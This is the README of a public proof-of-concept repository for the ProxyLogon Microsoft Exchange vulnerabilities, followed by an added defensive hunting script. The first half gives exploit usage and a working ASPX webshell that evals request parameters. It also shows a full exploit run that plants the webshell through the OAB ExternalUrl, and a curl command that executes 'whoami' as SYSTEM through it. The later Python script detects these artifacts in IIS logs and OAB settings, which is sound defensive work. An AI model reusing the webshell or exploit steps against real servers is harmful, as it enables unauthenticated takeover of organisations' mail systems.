praetorian-inc/proxylogon-exploit (repository archived by the owner on Apr 9, 2024; now read-only)

# proxylogon
Proof-of-concept exploit for CVE-2021-26855 and CVE-2021-27065, which together allow unauthenticated remote code execution on Microsoft Exchange, as described in the following resources:

## Usage

Exploitation requires the external URL of the frontend Exchange server (e.g. https://exchange.example.org) and the email address of a user on that system. The admin SID and the backend hostname can be leaked from the server itself.

```
$ python exploit.py -h
usage: exploit.py [-h] [--frontend FRONTEND] [--email EMAIL] [--sid SID]
  [--webshell WEBSHELL] [--path PATH]
  [--backend BACKEND]
  [--proxy PROXY]

proxylogon proof-of-concept

optional arguments:
  -h, --help           show this help message and exit
  --frontend FRONTEND  external url to exchange (e.g. https://exchange.example.org)
  --email EMAIL        valid email on the target machine
  --sid SID            exchange admin sid
  --webshell WEBSHELL  webshell to upload
  --path PATH          desired path to webshell on host
  --backend BACKEND    [optional] backend host (leaked in X-CalculatedBETarget)
  --proxy PROXY        [optional] proxy traffic (e.g. http://127.0.0.1:8080)
```

## Example

```
$ cat <<EOF > webshell.aspx
<script language="JScript" runat="server">
function Page_Load(){
eval(Request["kxpprfgvnosz"],"unsafe");
}
</script>
EOF

$ python exploit.py --frontend https://172.16.59.7 --backend exchange.hafnium.local \
  --email administrator@hafnium.local \
  --webshell webshell.aspx \
  --path 'C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\ecp\\auth\\o.aspx'
Retrieving backend via RPC
Backend: exchange.corp.contoso.com
Identified SID: S-1-5-21-...-500
Admin SID: S-1-5-21-...-500
Authenticating via proxylogon
Looking up OAB virtual directory
OAB virtual directory: OAB (Default Web Site)
Injecting payload into OAB ExternalUrl
Resetting OAB virtual directory
Enjoy your webshell!

$ curl -s -k https://172.16.59.7/ecp/auth/o.aspx \
  -d 'kxpprfgvnosz=Response.Write(
    new ActiveXObject("WScript.Shell")
      .Exec("cmd /c whoami")
      .StdOut
      .ReadAll()
);' | head -n 1
nt authority\system
```
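The run above leaves two artifacts a defender can look for: the OAB virtual directory's `ExternalUrl` briefly holds the payload instead of a URL, and the dropped page is then driven with POST requests to an `.aspx` file under `/ecp/auth/`. The following hunting script is an added example (not part of this repository's code): it flags tampered `ExternalUrl` values, such as the ones you would export with `Get-OabVirtualDirectory`, and scans IIS W3C log text for POSTs to `.aspx` files in the ECP auth directory. The field layout is taken from the log's own `#Fields:` header; all sample values below are constructed.

```python
"""Hunting checks for the artifacts left by the OAB ExternalUrl webshell drop.

Added example, not the exploit's own code. All sample data is constructed.
"""
import re

# A legitimate ExternalUrl is a plain absolute https URL and nothing else.
SAFE_EXTERNAL_URL = re.compile(r"^https://[A-Za-z0-9.\-]+(:\d+)?(/[A-Za-z0-9._\-/]*)?$")
# Server-side script markup has no business in that property.
SCRIPT_MARKUP = re.compile(r"<script|runat\s*=\s*['\"]server|<%", re.IGNORECASE)
# Any .aspx directly under the ECP auth directory (the example drops o.aspx there).
ECP_AUTH_ASPX = re.compile(r"^/ecp/auth/[^/]+\.aspx$", re.IGNORECASE)


def check_oab_external_url(value):
    """Return True when an OAB ExternalUrl value looks tampered with."""
    if not value:
        return False  # an empty ExternalUrl is a normal configuration
    if SCRIPT_MARKUP.search(value):
        return True
    return SAFE_EXTERNAL_URL.match(value) is None


def parse_iis_log(text):
    """Yield one dict per data line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not line.strip():
            continue
        if fields is None:
            raise ValueError("data line before #Fields header")
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # truncated line: skip rather than mis-map columns
        yield dict(zip(fields, values))


def find_webshell_posts(text):
    """Return (client ip, uri stem, status) for POSTs to .aspx files under /ecp/auth/."""
    hits = []
    for entry in parse_iis_log(text):
        if entry.get("cs-method", "").upper() != "POST":
            continue
        if ECP_AUTH_ASPX.match(entry.get("cs-uri-stem", "")):
            hits.append((entry["c-ip"], entry["cs-uri-stem"], entry["sc-status"]))
    return hits


# Constructed ExternalUrl values as Get-OabVirtualDirectory might report them.
OAB_SAMPLES = {
    "benign": "https://exchange.example.org/OAB",
    "empty": "",
    "tampered": 'http://ffff/#<script language="JScript" runat="server">x</script>',
}

# Constructed IIS W3C log excerpt with the default field set; IPs and times are made up.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2021-03-03 10:15:01 172.16.59.7 GET /ecp/auth/TimeoutLogout.aspx - 443 - 10.0.0.5 Mozilla/5.0 - 200 0 0 31
2021-03-03 10:15:07 172.16.59.7 POST /ecp/auth/o.aspx - 443 - 203.0.113.9 curl/7.68.0 - 200 0 0 118
2021-03-03 10:15:09 172.16.59.7 POST /owa/auth.owa - 443 - 10.0.0.5 Mozilla/5.0 - 302 0 0 12
"""

if __name__ == "__main__":
    for name, value in OAB_SAMPLES.items():
        print(f"OAB ExternalUrl {name}: {'TAMPERED' if check_oab_external_url(value) else 'ok'}")
    for ip, stem, status in find_webshell_posts(SAMPLE_LOG):
        print(f"webshell-style POST from {ip} to {stem} (status {status})")
```

Run it against a real export by replacing `SAMPLE_LOG` with the contents of the FrontEnd HttpProxy IIS log and `OAB_SAMPLES` with your directories' `ExternalUrl` values; baseline any POST hits against the `.aspx` files that legitimately ship in `FrontEnd\HttpProxy\ecp\auth` before treating them as a drop.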
